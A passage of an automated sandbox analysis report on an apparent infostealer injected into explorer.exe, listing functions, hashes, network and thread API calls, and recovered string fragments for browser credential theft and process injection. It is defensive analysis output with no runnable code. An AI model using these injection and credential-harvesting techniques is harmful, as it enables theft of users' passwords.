                                            • Instruction Fuzzy Hash: 70012C70618A1C8FCB88EF5CE088B55B7E0FB59314F1541AEA90DCB266DA74C9818BC2
                                            Function 112666B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 411 112666b2-112666e5 412 112666e7-112666ff call 11269942 411->412 413 11266705-1126672d send 411->413 412->413
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: send
                                            • String ID: send
                                            • API String ID: 2809346765-2809346765
                                            • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction ID: d97510939f7aff9a75bcc4158118803eb31f4bff69d2b8028ab47eef3c06930d
                                            • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                            • Instruction Fuzzy Hash: D7012570618A5D8FDBC8DF1CE048B2577E0FB58314F1545AED85DCB266DA70D881CB81
                                            Function 112665B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 416 112665b2-112665ea 417 112665ec-11266604 call 11269942 416->417 418 1126660a-1126662b socket 416->418 417->418
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: socket
                                            • String ID: sock
                                            • API String ID: 98920635-2415254727
                                            • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction ID: 02f297a12d7883113265a7e7327ed638836a97aa5b3671ba78fd6f54a2911a83
                                            • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                            • Instruction Fuzzy Hash: 81018F30618A1C8FCB84EF1CE048B54BBE0FB59314F1545AEE80ECB266C7B0C981CB82
                                            Function 1125E2DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 421 1125e2dd-1125e320 call 11269942 424 1125e326 421->424 425 1125e3fa-1125e40e 421->425 426 1125e328-1125e339 SleepEx 424->426 426->426 427 1125e33b-1125e341 426->427 428 1125e343-1125e349 427->428 429 1125e34b-1125e352 427->429 428->429 430 1125e35c-1125e36a call 11268f12 428->430 431 1125e354-1125e35a 429->431 432 1125e370-1125e376 429->432 430->432 431->430 431->432 433 1125e3b7-1125e3bd 432->433 434 1125e378-1125e37e 432->434 437 1125e3d4-1125e3db 433->437 438 1125e3bf-1125e3cf call 1125ee72 433->438 434->433 436 1125e380-1125e38a 434->436 436->433 440 1125e38c-1125e3b1 call 1125f432 436->440 437->426 442 1125e3e1-1125e3f5 call 1125e0f2 437->442 438->437 440->433 442->426
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction ID: ecac26ae2241de25b7ac7a8bdebf2bdfdf009804e657d639decdd5f3fa92f106
                                            • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                            • Instruction Fuzzy Hash: 6D317A74614B5AEBDBD4DF2980882E5F7A1FB44300F54826ECA5DCA107CB30A590CF92
                                            Function 1125E412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 457 1125e412-1125e446 call 11269942 460 1125e473-1125e47d 457->460 461 1125e448-1125e472 call 1126bc9e CreateThread 457->461
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4539237631.00000000111A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 111A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_111a0000_explorer.jbxd
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction ID: 07abd42f9a0c4096d1dc3a1de0c87da647205d0f858a9c19525ea430e1abae0a
                                            • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                            • Instruction Fuzzy Hash: 2FF02830228A090FD784EB2CD44163AF3D0FBA8204F40053E994DC3254DE34C5828705

                                            Non-executed Functions

                                            Function 0E6E3D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                            • API String ID: 0-393284711
                                            • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction ID: 44a222de50f5e2eb0a8b25036519e7aeee4a1c08284bcd869e7b2d621ae95868
                                            • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                            • Instruction Fuzzy Hash: 2AE16A70518F488FCB64EF78D4947AAB7E0FB58301F404A2E95AFC7681DF30A9018B89
                                            Function 0E6E6792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                            • API String ID: 0-2916316912
                                            • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction ID: 2bfff6b9bbc9584fe41b0a998e63e04d34a06ee63192b7ab705044b1323c70ea
                                            • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                            • Instruction Fuzzy Hash: 9BB17C30518B488EDB55EF68D489AEEB7F1FF98300F50492ED49AC7391EF7099058B86
                                            Function 0E6E4622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                            • API String ID: 0-1539916866
                                            • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction ID: fa2e8ebf822d6b01912a4d210a41e6935020652f9daa073c1e578adf8558f499
                                            • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                            • Instruction Fuzzy Hash: CA41BD70A18B088FDF14DF99A4596AE7BE2FB88700F40025ED809D3385DFB59D458BD6
                                            Function 0E6EBAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                            • API String ID: 0-355182820
                                            • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction ID: 1070486b71de12e07a0084df7cb724710d4d652b8243c344b76cdf8965f997dd
                                            • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                            • Instruction Fuzzy Hash: 0DC16D70218B098FC758EF68D49569AF3E1FB98304F404B2E95AAC7650DF30A915CB8A
                                            Function 0E6EBF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                            • API String ID: 0-97273177
                                            • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction ID: 640b05a26cbda37218930d8e209819f2b4c787a27e13cec0c5ba8540dc4c5f81
                                            • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                            • Instruction Fuzzy Hash: 5051C4315197488FD719DF18E4856AAB7E5FBC5700F501A2EE8CBC7341DBB49906CB82
                                            Function 0E6E52F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction ID: ac09738ed22ca259043a0e163c958a0087a2c7c695276ce6edd9e913506d9183
                                            • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                            • Instruction Fuzzy Hash: ACC18F70619A198FC758EB68E495AAAF3E1FB98304F50476D841FC7790DF30EE068789
                                            Function 0E6E52F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                            • API String ID: 0-639201278
                                            • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction ID: e3f701090150f215e23e022a574de3168eb54d5b10bc7a63bc52005cd44f6196
                                            • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                            • Instruction Fuzzy Hash: FEC18F70619A198FC758EB68E495AAAF3E1FB98304F50476D841FC7790DF30ED068B89
                                            Function 0E6E6CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction ID: 394845e033576a3932f146d56a4e95cfed39cd21e2fb2df2e0b8d16ed2516d17
                                            • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                            • Instruction Fuzzy Hash: 09A1A1706187488BDB19EFA8E4447EEB7E1FF98300F404A2DD48AD7392EF7099458789
                                            Function 0E6E6CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: UR$2$L: $Pass$User$name$word
                                            • API String ID: 0-2058692283
                                            • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction ID: 40702eba08e71035ef845c3166f8ba00b2d1cb44f3180e5c59fe347b30971813
                                            • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                            • Instruction Fuzzy Hash: A69191706187488BDB19EFA8E4447EEB7E1FF98300F40462ED44AD7392EF7199458789
                                            Function 0E6E6352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $.$e$n$v
                                            • API String ID: 0-1849617553
                                            • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction ID: 7b1783d2b6f6e1560ece7a7680258d88ff4575494f77f5f8a8635246bdb5071f
                                            • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                            • Instruction Fuzzy Hash: B8716071618B498FD758EFA8D4846AEB7F1FF98304F00062ED44AC73A1EB71AD458B85
                                            Function 0E6E1C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                            • API String ID: 0-1970020201
                                            • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction ID: 354fff2a525fb267e66dea4e607c664a160f2ccd9641c2f2ac1167fb8a053813
                                            • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                            • Instruction Fuzzy Hash: C2514EB0918B4C8FDB54EFA8D045AEEB7F1FF58300F404A2E949AE7254EF7095458B89
                                            Function 0E6E286F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4$\$dll$ion.$vers
                                            • API String ID: 0-1610437797
                                            • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction ID: a82aeb016c054224485606edbc0d228e0a10b5ee27bc071c9005f84c2c29e5f5
                                            • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                            • Instruction Fuzzy Hash: D1418E30219B8C8FCB74EF28A8557EAB3E5FB99301F40462E984EC7350EF3099458782
                                            Function 0E6E44B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 32.d$cli.$dll$sspi$user
                                            • API String ID: 0-327345718
                                            • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction ID: c28b585af984dd60aa54042d3b83c547490f9ad1269dfff497dd797c6649767c
                                            • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                            • Instruction Fuzzy Hash: 44415F30A1AE0D8FCB58EF68A0947AE77E1FB58300F50456EA80ED7791DE71D9418BC6
                                            Function 0E6E2432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$el32$h$kern
                                            • API String ID: 0-4264704552
                                            • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction ID: 03b9f7f3d06b991425b25a57e0c96811bcae11f3b8c227da53f18b4f55db43ff
                                            • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                            • Instruction Fuzzy Hash: 0C418070609B4D8FD768DF6890A43AAB7E1FB99300F104A2E949EC37A5DF70C945CB85
                                            Function 0E6E90B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction ID: cf70394188fccf185fe292ad3a3e9164fc6361e9245b9df420ed6f3b0613ab1c
                                            • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                            • Instruction Fuzzy Hash: EF31E13151DB885FC71AEB28D0886EAB7D0FB84300F504D1EE49BC7791EE31A949CB46
                                            Function 0E6E90C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Snif$f fr$om:
                                            • API String ID: 0-3434893486
                                            • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction ID: 2425a6029ea018aafeb9c84f3309bda2298d27e6ae972b2a367a7dcf1343e452
                                            • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                            • Instruction Fuzzy Hash: 04310031419B486FC719EF28D488AEAB7D4FB94300F504D1EE49BC3781EE30A946CB46
                                            Function 0E6E4FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction ID: e13fea5d0976711c2e6cdcf36484bb38daee4473be7921915c37ddc1e8f2dcd1
                                            • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                            • Instruction Fuzzy Hash: 35319030119B484FC784EF68A495BAAB7E1FF98300F94096DA44EC7794DF30D905C796
                                            Function 0E6E4FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .dll$chro$hild$me_c
                                            • API String ID: 0-3136806129
                                            • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction ID: 45317dc3cae25bc34aed31dfb71b58d41a83819345e45ba88a6b942ced6e202f
                                            • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                            • Instruction Fuzzy Hash: DE318F30119B488FC794EF68A494BAAB7E1FF99300F944A6D944ACB394DF30C905C796
                                            Function 0E6E78C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction ID: 52e9c43ae41000a67a23ca4334ccc32ef553844233f326659e943af1611f1f54
                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                            • Instruction Fuzzy Hash: 1F31C031614A0C8BCB04EFA8D8847EDBBE0FF58204F40062AD45ED7380EF749A458799
                                            Function 0E6E78BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                            • API String ID: 0-319646191
                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction ID: 92c08b00a0be2709d542e4924902c15d46f2045d329718c0c9e6b8873c353044
                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                            • Instruction Fuzzy Hash: 7121CE30A11A4C8ACB05EFA8D8847EDBBE0FF58304F40462ED45AD7380EF749A058B99
                                            Function 0E6E8E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction ID: b77aff4bc50a083515b9b829806a77fbc1a6cbf82dfcc7ca5907871917fd0f23
                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                            • Instruction Fuzzy Hash: B3216D74A24A0D9BDB08EFA8D0447EDBBF1FB58304F504A2ED019D3B50DB7599558B88
                                            Function 0E6E8E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$l$l$t
                                            • API String ID: 0-168566397
                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction ID: 1591d70ef4ed02870de1035beafef9e9e8921b4e7d1a02bda35953687a62adac
                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                            • Instruction Fuzzy Hash: FB217C70A24A0D9FDB08EFA8D0447AEBBF1FB58300F504A2ED009D3B50DB7599558B88
                                            Function 0E6E8FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4537984789.000000000E6D0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0E6D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_e6d0000_explorer.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: auth$logi$pass$user
                                            • API String ID: 0-2393853802
                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction ID: f2807cf3da98b22e58c1a24601d561c1b73617646b10123106e4223592ac4224
                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                            • Instruction Fuzzy Hash: 2321C030624B0D8BCB05DF99A8906EEB7E1EF88344F00461DD40ADB385D7B1DD548BC6

                                            Execution Graph

                                            Execution Coverage:1.8%
                                            Dynamic/Decrypted Code Coverage:6.7%
                                            Signature Coverage:0%
                                            Total number of Nodes:623
                                            Total number of Limit Nodes:71
                                            execution_graph 107054 919080 107065 91bd40 107054->107065 107056 91919c 107057 9190bb 107057->107056 107068 90acf0 107057->107068 107061 919120 Sleep 107064 91910d 107061->107064 107064->107056 107064->107061 107077 918ca0 LdrLoadDll 107064->107077 107078 918eb0 LdrLoadDll 107064->107078 107066 91bd6d 107065->107066 107079 91a540 107065->107079 107066->107057 107069 90ad14 107068->107069 107070 90ad50 LdrLoadDll 107069->107070 107071 90ad1b 107069->107071 107070->107071 107072 914e50 107071->107072 107073 914e6a 107072->107073 107074 914e5e 107072->107074 107073->107064 107074->107073 107086 9152d0 LdrLoadDll 107074->107086 107076 914fbc 107076->107064 107077->107064 107078->107064 107080 91a55c NtAllocateVirtualMemory 107079->107080 107082 91af60 107079->107082 107080->107066 107083 91af70 107082->107083 107085 91af92 107082->107085 107084 914e50 LdrLoadDll 107083->107084 107084->107085 107085->107080 107086->107076 107087 4adcb84 107090 4ada042 107087->107090 107089 4adcba5 107092 4ada06b 107090->107092 107091 4ada56c 107091->107089 107092->107091 107093 4ada182 NtQueryInformationProcess 107092->107093 107095 4ada1ba 107093->107095 107094 4ada1ef 107094->107089 107095->107094 107096 4ada2db 107095->107096 107097 4ada290 107095->107097 107098 4ada2fc NtSuspendThread 107096->107098 107119 4ad9de2 NtCreateSection NtMapViewOfSection NtClose 